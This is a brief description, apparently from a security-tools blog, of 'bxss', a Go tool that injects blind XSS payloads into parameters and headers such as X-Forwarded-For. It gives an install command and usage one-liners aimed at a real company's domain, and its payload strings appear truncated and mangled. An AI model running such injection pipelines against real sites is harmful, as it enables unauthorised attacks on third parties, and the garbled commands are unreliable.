Bxss is one script written in go, which allows us to discover Blind XSS Injector security holes.
Specifications
Insert Blind XSS payloads into custom headers
Enter Blind XSS payloads in parameters
Uses different request methods (PUT, POST, GET, OPTIONS) simultaneously
It has a large chain tools
Really very fast
Easy to install
Installation
$ go get -u github.com/ethicalhackingplayground/bxss
Use
Blind XSS In Parameters
$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload '”>'-parameters
Blind XSS In X-Forwarded-For Header
$ subfinder uber.com | gau | bxss -payload '”>'-header “X-Forwarded-For”
Application snapshots
You can download it program from here.